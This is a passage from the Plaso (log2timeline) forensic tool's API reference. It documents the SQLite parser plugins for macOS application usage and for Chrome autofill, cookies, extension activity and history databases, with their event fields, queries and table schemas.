MacOS application usage event data. application name of the application. Type str app_version version of the application. Type str bundle_id bundle identifier of the application. Type str count TODO: number of times what? Type int query SQL query that was used to obtain the event data. Type str DATA_TYPE = 'macosx:application_usage' plaso.parsers.sqlite_plugins.chrome_autofill module

SQLite parser plugin for Google Chrome autofill database (Web Data) files. class plaso.parsers.sqlite_plugins.chrome_autofill.ChromeAutofillEventData Bases: plaso.containers.events.EventData Chrome Autofill event data. field_name name of form field. Type str query SQL query that was used to obtain the event data. Type str usage_count count of times value has been used in field_name. Type int value value populated in form field. Type str DATA_TYPE = 'chrome:autofill:entry' class plaso.parsers.sqlite_plugins.chrome_autofill.ChromeAutofillPlugin Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin SQLite parser plugin for Google Chrome autofill database (Web Data) files.

248 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

The Google Chrome autofill database (Web Data) file is typically stored in: Web Data DATA_FORMAT = 'Google Chrome autofill SQLite database (Web Data) file' NAME = 'chrome_autofill' ParseAutofillRow(parser_mediator, query, row, **unused_kwargs) Parses an autofill entry row. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row. QUERIES = [('SELECT autofill.date_created, autofill.date_last_used, autofill.name, autofill.value, autofill.count FROM autofill ORDER BY date_created', 'ParseAutofillRow')] REQUIRED_STRUCTURE = {'autofill': frozenset({'count', 'date_created', 'date_last_used', 'name', 'value'})} SCHEMAS = [{'autofill': 'CREATE TABLE autofill (name VARCHAR, value VARCHAR, value_lower VARCHAR, date_created INTEGER DEFAULT 0, date_last_used INTEGER DEFAULT 0, count INTEGER DEFAULT 1, PRIMARY KEY (name, value));)'}] plaso.parsers.sqlite_plugins.chrome_cookies module

SQLite parser plugin for Google Chrome cookies database files. class plaso.parsers.sqlite_plugins.chrome_cookies.BaseChromeCookiePlugin Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin SQLite parser plugin for Google Chrome cookies database files. GA_UTMZ_TRANSLATION = {'utmccn': 'Ad campaign information.', 'utmcct': 'Path to the page of referring link.', 'utmcmd': 'Last type of visit.', 'utmcsr': 'Last source used to access.', 'utmctr': 'Keywords used to find site.'} ParseCookieRow(parser_mediator, query, row, **unused_kwargs) Parses a cookie row. Parameters • parser_mediator (ParserMediator) – parser mediator. • query (str) – query that created the row. • row (sqlite3.Row) – row resulting from the query. class plaso.parsers.sqlite_plugins.chrome_cookies.Chrome17CookiePlugin Bases: plaso.parsers.sqlite_plugins.chrome_cookies.BaseChromeCookiePlugin SQLite parser plugin for Google Chrome 17 - 65 cookies database files. DATA_FORMAT = 'Google Chrome 17 - 65 cookies SQLite database file' NAME = 'chrome_17_cookies' QUERIES = [('SELECT creation_utc, host_key, name, value, path, expires_utc, secure, httponly, last_access_utc, has_expires, persistent FROM cookies', 'ParseCookieRow')]

5.1. Subpackages 249 Plaso (log2timeline), Release 20210606

REQUIRED_STRUCTURE = {'cookies': frozenset({'creation_utc', 'expires_utc', 'has_expires', 'host_key', 'httponly', 'last_access_utc', 'name', 'path', 'persistent', 'secure', 'value'}), 'meta': frozenset({})} SCHEMAS = [{'cookies': 'CREATE TABLE cookies (creation_utc INTEGER NOT NULL UNIQUE PRIMARY KEY, host_key TEXT NOT NULL, name TEXT NOT NULL, value TEXT NOT NULL, path TEXT NOT NULL, expires_utc INTEGER NOT NULL, secure INTEGER NOT NULL, httponly INTEGER NOT NULL, last_access_utc INTEGER NOT NULL, has_expires INTEGER DEFAULT 1, persistent INTEGER DEFAULT 1)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)'}] class plaso.parsers.sqlite_plugins.chrome_cookies.Chrome66CookiePlugin Bases: plaso.parsers.sqlite_plugins.chrome_cookies.BaseChromeCookiePlugin SQLite parser plugin for Google Chrome 66+ cookies database files. DATA_FORMAT = 'Google Chrome 66 and later cookies SQLite database file' NAME = 'chrome_66_cookies' QUERIES = [('SELECT creation_utc, host_key, name, value, path, expires_utc, is_secure AS secure, is_httponly AS httponly, last_access_utc, has_expires, is_persistent AS persistent FROM cookies', 'ParseCookieRow')] REQUIRED_STRUCTURE = {'cookies': frozenset({'creation_utc', 'expires_utc', 'has_expires', 'host_key', 'is_httponly', 'is_persistent', 'is_secure', 'last_access_utc', 'name', 'path', 'value'}), 'meta': frozenset({})} SCHEMAS = [{'cookies': "CREATE TABLE cookies (creation_utc INTEGER NOT NULL, host_key TEXT NOT NULL, name TEXT NOT NULL, value TEXT NOT NULL, path TEXT NOT NULL, expires_utc INTEGER NOT NULL, is_secure INTEGER NOT NULL, is_httponly INTEGER NOT NULL, last_access_utc INTEGER NOT NULL, has_expires INTEGER NOT NULL DEFAULT 1, is_persistent INTEGER NOT NULL DEFAULT 1, priority INTEGER NOT NULL DEFAULT 1, encrypted_value BLOB DEFAULT '', firstpartyonly INTEGER NOT NULL DEFAULT 0, UNIQUE (host_key, name, path))", 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)'}] class plaso.parsers.sqlite_plugins.chrome_cookies.ChromeCookieEventData Bases: plaso.containers.events.EventData Chrome Cookie event data. cookie_name name of the cookie. Type str host hostname of host that set the cookie value. Type str httponly True if the cookie cannot be accessed through client side script. Type bool path path where the cookie got set. Type str

250 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

persistent True if the cookie is persistent. Type bool query SQL query that was used to obtain the event data. Type str secure True if the cookie should only be transmitted over a secure channel. Type bool url URL or path where the cookie got set. Type str data value of the cookie. Type str DATA_TYPE = 'chrome:cookie:entry' plaso.parsers.sqlite_plugins.chrome_extension_activity module

SQLite parser plugin for Google Chrome extension activity database files. class plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityEventData Bases: plaso.containers.events.EventData Chrome Extension Activity event data. action_type action type. Type str activity_id activity identifier. Type str api_name name of API. Type str arg_url URL argument. Type str args arguments. Type str extension_id extension identifier.

5.1. Subpackages 251 Plaso (log2timeline), Release 20210606

Type str other other. Type str page_title title of webpage. Type str page_url URL of webpage. Type str query SQL query that was used to obtain the event data. Type str DATA_TYPE = 'chrome:extension_activity:activity_log' class plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityPlugin Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin SQLite parser plugin for Google Chrome extension activity database files. The Google Chrome extension activity database file is typically stored in: Extension Activity DATA_FORMAT = 'Google Chrome extension activity SQLite database file' NAME = 'chrome_extension_activity' ParseActivityLogUncompressedRow(parser_mediator, query, row, **unused_kwargs) Parses an activity log row. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row. QUERIES = [('SELECT time, extension_id, action_type, api_name, args, page_url, page_title, arg_url, other, activity_id FROM activitylog_uncompressed ORDER BY time', 'ParseActivityLogUncompressedRow')] REQUIRED_STRUCTURE = {'activitylog_compressed': frozenset({'action_type', 'api_name_x', 'arg_url_x', 'args_x', 'extension_id_x', 'other_x', 'page_title_x', 'page_url_x', 'time'})} SCHEMAS = [{'activitylog_compressed': 'CREATE TABLE activitylog_compressed (count INTEGER NOT NULL DEFAULT 1, extension_id_x INTEGER NOT NULL, time INTEGER, action_type INTEGER, api_name_x INTEGER, args_x INTEGER, page_url_x INTEGER, page_title_x INTEGER, arg_url_x INTEGER, other_x INTEGER)', 'string_ids': 'CREATE TABLE string_ids (id INTEGER PRIMARY KEY, value TEXT NOT NULL)', 'url_ids': 'CREATE TABLE url_ids (id INTEGER PRIMARY KEY, value TEXT NOT NULL)'}]

252 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 plaso.parsers.sqlite_plugins.chrome_history module

SQLite parser plugin for Google Chrome history database files. class plaso.parsers.sqlite_plugins.chrome_history.BaseGoogleChromeHistoryPlugin Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin SQLite parser plugin for Google Chrome history database files. The Google Chrome history database file is typically stored in: Archived History History Note that the Archived History database does not contain the downloads table. ParseLastVisitedRow(parser_mediator, query, row, cache=None, database=None, **unused_kwargs) Parses a last visited row. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row. • cache (SQLiteCache) – cache which contains cached results from querying the visits and urls tables. • database (Optional[SQLiteDatabase]) – database. class plaso.parsers.sqlite_plugins.chrome_history.ChromeHistoryFileDownloadedEventData Bases: plaso.containers.events.EventData Chrome History file downloaded event data. danger_type assessment by Safe Browsing of the danger of the downloaded content. Type int full_path full path where the file was downloaded to. Type str interrupt_reason indication why the download was interrupted. Type int offset identifier of the row, from which the event data was extracted. Type str opened value to indicate if the downloaded file was opened from the browser. Type int query SQL query that was used to obtain the event data. Type str received_bytes number of bytes received while downloading.

5.1. Subpackages 253 Plaso (log2timeline), Release 20210606

Type int state state of the download, such as finished or cancelled. Type int total_bytes total number of bytes to download. Type int url URL of the downloaded file. Type str DATA_TYPE = 'chrome:history:file_downloaded' class plaso.parsers.sqlite_plugins.chrome_history.ChromeHistoryPageVisitedEventData Bases: plaso.containers.events.EventData Chrome History page visited event data. from_visit URL where the visit originated from. Type str offset identifier of the row, from which the event data was extracted. Type str page_transition_type type of transitions between pages. Type int query SQL query that was used to obtain the event data. Type str title title of the visited page. Type str typed_count number of characters of the URL that were typed. Type int url URL of the visited page. Type str url_hidden True if the URL is hidden. Type bool visit_source source of the page visit.

254 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Type int DATA_TYPE = 'chrome:history:page_visited' class plaso.parsers.sqlite_plugins.chrome_history.GoogleChrome27HistoryPlugin Bases: plaso.parsers.sqlite_plugins.chrome_history.BaseGoogleChromeHistoryPlugin SQLite parser plugin for Google Chrome 27+ history database files. DATA_FORMAT = 'Google Chrome 27 and later history SQLite database file' NAME = 'chrome_27_history' ParseFileDownloadedRow(parser_mediator, query, row, **unused_kwargs) Parses a file downloaded row. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row. QUERIES = [('SELECT urls.id, urls.url, urls.title, urls.visit_count, urls.typed_count, urls.last_visit_time, urls.hidden, visits.visit_time, visits.from_visit, visits.transition, visits.id AS visit_id FROM urls, visits WHERE urls.id = visits.url ORDER BY visits.visit_time', 'ParseLastVisitedRow'), ('SELECT downloads.id AS id, downloads.start_time,downloads.target_path, downloads_url_chains.url, downloads.received_bytes, downloads.total_bytes, downloads.end_time, downloads.state, downloads.danger_type, downloads.interrupt_reason, downloads.opened FROM downloads, downloads_url_chains WHERE downloads.id = downloads_url_chains.id', 'ParseFileDownloadedRow')] REQUIRED_STRUCTURE = {'downloads': frozenset({'danger_type', 'end_time', 'id', 'interrupt_reason', 'opened', 'received_bytes', 'start_time', 'state', 'target_path', 'total_bytes'}), 'downloads_url_chains': frozenset({'id', 'url'}), 'urls': frozenset({'hidden', 'id', 'last_visit_time', 'title', 'typed_count', 'url', 'visit_count'}), 'visits': frozenset({'from_visit', 'id', 'transition', 'visit_time'})}

5.1. Subpackages 255 Plaso (log2timeline), Release 20210606

SCHEMAS = [{'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL, interrupt_reason INTEGER NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL)', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,is_indexed BOOLEAN,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL, interrupt_reason INTEGER NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,referrer VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL)', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL,interrupt_reason INTEGER NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,referrer VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL,mime_type VARCHAR(255) NOT NULL,original_mime_type VARCHAR(255) NOT NULL)', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 256 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARYChapter KEY,segment_id 5. plaso package INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,guid VARCHAR NOT NULL,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL,interrupt_reason INTEGER NOT NULL,hash BLOB NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,referrer VARCHAR NOT NULL,site_url VARCHAR NOT NULL,tab_url VARCHAR NOT NULL,tab_referrer_url VARCHAR NOT NULL,http_method VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL,mime_type VARCHAR(255) NOT NULL,original_mime_type VARCHAR(255) NOT NULL)', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,guid VARCHAR NOT NULL,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL,interrupt_reason INTEGER NOT NULL,hash BLOB NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,referrer VARCHAR NOT NULL,site_url VARCHAR NOT NULL,tab_url VARCHAR NOT NULL,tab_referrer_url VARCHAR NOT NULL,http_method VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL,mime_type VARCHAR(255) NOT NULL,original_mime_type VARCHAR(255) NOT NULL)', 'downloads_slices': 'CREATE TABLE downloads_slices (download_id INTEGER NOT NULL,offset INTEGER NOT NULL,received_bytes INTEGER NOT NULL,PRIMARY KEY (download_id, offset) )', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,guid VARCHAR NOT NULL,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL,interrupt_reason INTEGER NOT NULL,hash BLOB NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,last_access_time INTEGER NOT NULL,transient INTEGER NOT NULL,referrer VARCHAR NOT NULL,site_url VARCHAR NOT NULL,tab_url VARCHAR NOT NULL,tab_referrer_url VARCHAR NOT NULL,http_method VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL,mime_type VARCHAR(255) NOT NULL,original_mime_type VARCHAR(255) NOT NULL)', 'downloads_slices': 'CREATE TABLE downloads_slices (download_id INTEGER NOT NULL,offset INTEGER NOT NULL,received_bytes INTEGER NOT NULL,PRIMARY KEY (download_id, offset) )', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'typed_url_sync_metadata': 'CREATE TABLE typed_url_sync_metadata (storage_key INTEGER PRIMARY KEY NOT NULL,value BLOB)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY AUTOINCREMENT,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,guid VARCHAR NOT NULL,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL,interrupt_reason INTEGER NOT NULL,hash BLOB NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,referrer VARCHAR NOT NULL,site_url VARCHAR NOT NULL,tab_url VARCHAR NOT NULL,tab_referrer_url VARCHAR NOT NULL,http_method VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL,mime_type VARCHAR(255) NOT NULL,original_mime_type VARCHAR(255) NOT NULL, last_access_time INTEGER NOT NULL DEFAULT 0, transient INTEGER NOT NULL DEFAULT 0)', 'downloads_slices': 'CREATE TABLE downloads_slices (download_id INTEGER NOT NULL,offset INTEGER NOT NULL,received_bytes INTEGER NOT NULL,PRIMARY KEY (download_id, offset) )', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'typed_url_sync_metadata': 'CREATE TABLE typed_url_sync_metadata (storage_key INTEGER PRIMARY KEY NOT NULL,value BLOB)', 'urls': 'CREATE TABLE "urls"(id INTEGER PRIMARY KEY AUTOINCREMENT,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': "CREATE TABLE downloads (id INTEGER PRIMARY KEY,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL,interrupt_reason INTEGER NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,referrer VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL,mime_type VARCHAR(255) NOT NULL,original_mime_type VARCHAR(255) NOT NULL, guid VARCHAR NOT NULL DEFAULT '', hash BLOB NOT NULL DEFAULT X'', http_method VARCHAR NOT NULL DEFAULT '', tab_url VARCHAR NOT NULL DEFAULT '', tab_referrer_url VARCHAR NOT NULL DEFAULT '', site_url VARCHAR NOT NULL DEFAULT '', last_access_time INTEGER NOT NULL DEFAULT 0, transient INTEGER NOT NULL DEFAULT 0)", 'downloads_slices': 'CREATE TABLE downloads_slices (download_id INTEGER NOT NULL,offset INTEGER NOT NULL,received_bytes INTEGER NOT NULL,PRIMARY KEY (download_id, offset) )', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE 